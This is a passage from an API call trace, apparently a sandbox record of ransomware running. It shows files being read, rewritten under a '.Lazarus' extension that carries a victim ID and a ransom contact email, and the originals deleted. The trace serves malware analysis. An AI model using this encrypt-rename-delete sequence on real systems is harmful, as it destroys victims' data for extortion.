dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.543] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a)) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.543] AreFileApisANSI () returned 1 [0060.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.544] GetLastError () returned 0x0 [0060.544] SetLastError (dwErrCode=0x0) [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0060.544] GetLastError () returned 0x0 [0060.544] SetLastError (dwErrCode=0x0) [0060.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68b80 [0060.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0060.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.544] AreFileApisANSI () returned 1 [0060.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0060.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x31cd0 [0060.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x31cd0, cchWideChar=96 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 96 [0060.544] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0060.545] GetFileType (hFile=0x410) returned 0x1 [0060.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.545] AreFileApisANSI () returned 1 [0060.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0060.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.545] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.545] GetFileType (hFile=0x424) returned 0x1 [0060.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.546] GetLastError () returned 0x0 [0060.546] SetLastError (dwErrCode=0x0) [0060.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.546] GetLastError () returned 0x0 [0060.546] SetLastError (dwErrCode=0x0) [0060.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0060.546] ReadFile (in: hFile=0x424, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f030*=0x4a, lpOverlapped=0x0) returned 1 [0060.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.547] ReadFile (in: hFile=0x424, lpBuffer=0x83fb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x83fb0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0060.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.547] GetLastError () returned 0x0 [0060.547] SetLastError (dwErrCode=0x0) [0060.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa) returned 0x7d798 [0060.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0060.548] GetLastError () returned 0x0 [0060.548] SetLastError (dwErrCode=0x0) [0060.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0060.548] WriteFile (in: hFile=0x410, lpBuffer=0x8a210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesWritten=0x327ef70*=0x50, lpOverlapped=0x0) returned 1 [0060.549] GetLastError () returned 0x0 [0060.549] SetLastError (dwErrCode=0x0) [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0060.549] GetLastError () returned 0x0 [0060.549] SetLastError (dwErrCode=0x0) [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0060.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.549] CloseHandle (hObject=0x410) returned 1 [0060.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.550] CloseHandle (hObject=0x424) returned 1 [0060.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.550] AreFileApisANSI () returned 1 [0060.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69170 [0060.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.551] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.551] GetFileType (hFile=0x424) returned 0x1 [0060.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x83fb0 [0060.552] GetLastError () returned 0xb7 [0060.552] SetLastError (dwErrCode=0xb7) [0060.552] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0060.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x83fb0 | out: hHeap=0x20000) returned 1 [0060.553] CloseHandle (hObject=0x424) returned 1 [0060.553] AreFileApisANSI () returned 1 [0060.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0060.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69490 [0060.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x69490, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0060.553] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.554] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x23, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0060.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0060.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0060.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.555] AreFileApisANSI () returned 1 [0060.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 40 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.556] AreFileApisANSI () returned 1 [0060.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0060.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d000, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.556] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.556] GetFileType (hFile=0x424) returned 0x1 [0060.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0060.556] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0060.556] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0060.556] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0060.557] CloseHandle (hObject=0x424) returned 1 [0060.558] AreFileApisANSI () returned 1 [0060.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0060.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d4d0, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.560] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.563] GetFileType (hFile=0x424) returned 0x1 [0060.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0060.563] CloseHandle (hObject=0x424) returned 1 [0060.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.575] AreFileApisANSI () returned 1 [0060.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0060.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0060.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6cef8, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0060.575] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133)) returned 1 [0060.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 